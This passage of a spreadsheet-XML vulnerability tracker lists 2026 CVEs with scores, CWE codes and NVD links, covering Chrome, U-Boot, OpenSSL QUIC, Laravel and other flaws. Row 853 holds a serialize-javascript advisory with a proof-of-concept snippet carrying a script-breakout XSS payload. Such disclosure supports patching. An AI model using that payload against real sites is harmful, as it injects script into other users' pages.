      <c r="P843" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q843" s="5" t="inlineStr"/>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S843" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Safebrowsing in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95292</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95300</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="inlineStr"/>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q844" s="5" t="inlineStr"/>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S844" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95300</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95358</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="inlineStr"/>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K845" s="5" t="inlineStr"/>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q845" s="5" t="inlineStr"/>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S845" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Mobile in Google Chrome on on Android prior to 154.0.8037.57 allowed a local attacker to bypass system access restrictions into a privileged page via a co-installed app. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95358</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102312</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="inlineStr"/>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K846" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q846" s="5" t="inlineStr"/>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S846" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Omnibox in Google Chrome on on Android prior to 154.0.8037.92 allowed a remote attacker to spoof address bar via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102312</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.8 → 4.3)</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71974</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="inlineStr"/>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q847" s="5" t="inlineStr"/>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S847" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc3 contains an out-of-bounds write vulnerability in read_slotted_partition() that fails to validate image size against partition bounds. Attackers with physical access can supply crafted boot media with oversized headers to write past the load buffer into bootloader memory on devices without Android Verified Boot protection.</t>
        </is>
      </c>
      <c r="T847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71974</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95340</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="inlineStr"/>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q848" s="5" t="inlineStr"/>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S848" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in PictureInPicture in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95340</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95342</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="inlineStr"/>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K849" s="5" t="inlineStr"/>
      <c r="L849" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q849" s="5" t="inlineStr"/>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S849" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in V8 in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95342</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95361</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="inlineStr"/>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q850" s="5" t="inlineStr"/>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S850" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95361</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35191</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="inlineStr"/>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q851" s="5" t="inlineStr"/>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>CWE-440</t>
        </is>
      </c>
      <c r="S851" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The OpenSSL QUIC server, when configured to not preform address
validation, can be forced to count incoming packets multiple times in its
unvalidated credit computation, leading to a violation of the RFC 9000
unvalidated connection amplification limit of 3 times the amount of data
received.
Impact summary: A remote attacker able to spoof packets to a server using the
OpenSSL QUIC implementation might use the server for an amplification of
a DDoS attack.
CWE: CWE-440: Expected Behavior Violation 
Description: OpenSSL's QUIC stack, when operating as a server, enforces client
address validation (RFC 9000, Section 8), to confirm the peer address is not
used for a traffic amplification attack.  If this feature is disabled on the
server, the QUIC stack limits the amount of server data that can be sent to 3
times the amount of data received from the peer address, until such time as the
TLS handshake is completed.
The OpenSSL QUIC server, when operating in non-validation mode, adds the
length of the whole datagram received to the unvalidated credit limit when
processing each QUIC packet in the datagram. A remote peer may,
after establishing a connection with an initial client hello frame, send a
subsequent datagram containing multiple QUIC packets, leading the server to
account the entire datagram length for each packet in the datagram, resulting
in the server believing that the peer has sent more data than it actually has,
thereby violating the 3x amplification limit mandated by the RFC.
FIPS impact: no
As the QUIC stack lives outside the FIPS module boundary, no FIPS modules
are affected by this CVE.</t>
        </is>
      </c>
      <c r="T851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35191</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102279</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q852" s="5" t="inlineStr"/>
      <c r="R852" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="S852" s="5" t="inlineStr">
        <is>
          <t>Laravel is a web application framework. Prior to 12.69.0 and 13.30.0, Laravel exception debug pages with APP_DEBUG=true pass attacker-controlled input to a Tippy.js tooltip configured with allowHTML true, enabling DOM-based cross-site scripting when a user hovers over the tooltip. This issue is fixed in versions 12.69.0 and 13.30.0.</t>
        </is>
      </c>
      <c r="T852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102279</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97711</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="inlineStr"/>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K853" s="5" t="inlineStr"/>
      <c r="L853" s="5" t="inlineStr">
        <is>
          <t>npm:serialize-javascript</t>
        </is>
      </c>
      <c r="M853" s="5" t="inlineStr">
        <is>
          <t>7.1.2</t>
        </is>
      </c>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr"/>
      <c r="P853" s="5" t="inlineStr"/>
      <c r="Q853" s="5" t="inlineStr"/>
      <c r="R853" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="S853" s="5" t="inlineStr">
        <is>
          <t>### Impact
`serialize-javascript` escapes its output so it is safe to embed inside a
`&lt;script&gt;` element. In 7.1.1 that guarantee does not hold for **function
values**: a crafted function body can carry a literal, unescaped `&lt;/script&gt;`
into the output, terminating the script element early so the remainder is
parsed as HTML.
`SCRIPT_CLOSE_REGEXP` used `&lt;\/script[^&gt;]*&gt;` as its first alternative. The
character class excludes only `&gt;`, so a single match could run from one
`&lt;/script` all the way to the next `&gt;` anywhere in the source — swallowing a
second, complete `&lt;/script&gt;` along the way. Only one replacement is emitted
per match, and the plain-code branch neutralizes just the leading `&lt;`
(`'&lt; ' + match.slice(1)`), so the swallowed tag was re-emitted verbatim.
Reaching that shape requires `&lt;/script` in code position, which is legal
JavaScript: `x&lt;/script=+/` parses as `x &lt; /script=+/`, a comparison against a
regex literal.
```js
const serialize = require('serialize-javascript');
const src = "function f(x){ return x&lt;/script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }";
const out = serialize({ h: new Function('return ' + src)() });
// {"h":function f(x){ return x&lt; /script=+/ + '&lt;/script&gt;&lt;img src=x onerror=alert(1)&gt;' }}
```
Embedded as the README documents (`&lt;script&gt;window.S = &lt;%= serialize(state) %&gt;&lt;/script&gt;`)
and parsed by Chromium, the script element ends at the injected tag and the
`&lt;img&gt;` becomes a live DOM node with its `onerror` handler executing in the
page origin.
Only the function path is affected. The same payload passed as **data** is
escaped correctly, and `options.isJSON` / non-function values are unaffected.
### Patches
Fixed in **7.1.2**. The wildcard now excludes `&lt;` as well as `&gt;`
(`[^&lt;&gt;]*`), so a match can never reach past a second `&lt;`. Every `&lt;/script`
in the source therefore either begins its own match or is followed by a
character the HTML tokenizer does not accept as ending a tag name — it ends
the tag name only on TAB, LF, FF, CR, SPACE, `/` or `&gt;`, and emits anything
else as text.
### Workarounds
Upgrade to **7.1.2**. If you cannot upgrade, 7.1.0 and earlier are
unaffected, or avoid serializing functions whose source text is
attacker-influenced.
### Regression note
This is a regression specific to 7.1.1, not a long-standing issue. 7.1.0 and
earlier applied the same wildcard but escaped the **entire** match, so no tag
survived. Downstream scanners defaulting to a `&gt;= 7.1.0` range would be
overly broad.</t>
        </is>
      </c>
      <c r="T853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97711</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102842</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E854" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F854" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G854" s="5" t="inlineStr"/>
      <c r="H854" s="5" t="inlineStr"/>
      <c r="I854" s="5" t="inlineStr"/>
      <c r="J854" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K854" s="5" t="inlineStr"/>
      <c r="L854" s="5" t="inlineStr"/>
      <c r="M854" s="5" t="inlineStr"/>
      <c r="N854" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O854" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P854" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q854" s="5" t="inlineStr"/>
      <c r="R854" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-434</t>
        </is>
      </c>
      <c r="S854" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. Affected by this issue is the function app_user_login_model.php::cekUserLogin of the file application/models/app_user_login_model.php of the component KCFinder File Manager. Such manipulation of the argument ADMIN_RS_KCFINDER leads to unrestricted upload. It is possible to launch the attack remotely. The exploit is publicly available and might be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102842</t>
        </is>
      </c>
    </row>
    <row r="855">
      <c r="A855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B855" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102847</t>
        </is>
      </c>
      <c r="D855" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E855" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F855" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G855" s="5" t="inlineStr"/>
      <c r="H855" s="5" t="inlineStr"/>
      <c r="I855" s="5" t="inlineStr"/>
      <c r="J855" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K855" s="5" t="inlineStr"/>
      <c r="L855" s="5" t="inlineStr"/>
      <c r="M855" s="5" t="inlineStr"/>
      <c r="N855" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O855" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P855" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q855" s="5" t="inlineStr"/>
      <c r="R855" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S855" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. The affected element is the function kirim of the file application/modules/web/controllers/buku_tamu.php of the component Guest Book. This manipulation of the argument nama/email/pesan causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been published and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102847</t>
        </is>
      </c>
    </row>
    <row r="856">
      <c r="A856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B856" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.4 → 2.1)</t>
        </is>
      </c>
      <c r="C856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102877</t>
        </is>
      </c>
      <c r="D856" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E856" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F856" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G856" s="5" t="inlineStr"/>
      <c r="H856" s="5" t="inlineStr"/>
      <c r="I856" s="5" t="inlineStr"/>
      <c r="J856" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K856" s="5" t="inlineStr"/>
      <c r="L856" s="5" t="inlineStr"/>
      <c r="M856" s="5" t="inlineStr"/>
      <c r="N856" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O856" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P856" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q856" s="5" t="inlineStr"/>
      <c r="R856" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S856" s="5" t="inlineStr">
        <is>
          <t>Fider before 0.38.0 contains a server-side request forgery vulnerability due to a time-of-check time-of-use gap in URL validation for webhooks and custom OAuth provider endpoints. Administrators controlling DNS can perform DNS rebinding attacks to make the Fider server send requests to internal services or cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="T856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102877</t>
        </is>
      </c>
    </row>
    <row r="857">
      <c r="A857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B857" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102771</t>
        </is>
      </c>
      <c r="D857" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E857" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F857" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G857" s="5" t="inlineStr"/>
      <c r="H857" s="5" t="inlineStr"/>
      <c r="I857" s="5" t="inlineStr"/>
      <c r="J857" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K857" s="5" t="inlineStr"/>
      <c r="L857" s="5" t="inlineStr"/>
      <c r="M857" s="5" t="inlineStr"/>
      <c r="N857" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O857" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P857" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q857" s="5" t="inlineStr"/>
      <c r="R857" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-791</t>
        </is>
      </c>
      <c r="S857" s="5" t="inlineStr">
        <is>
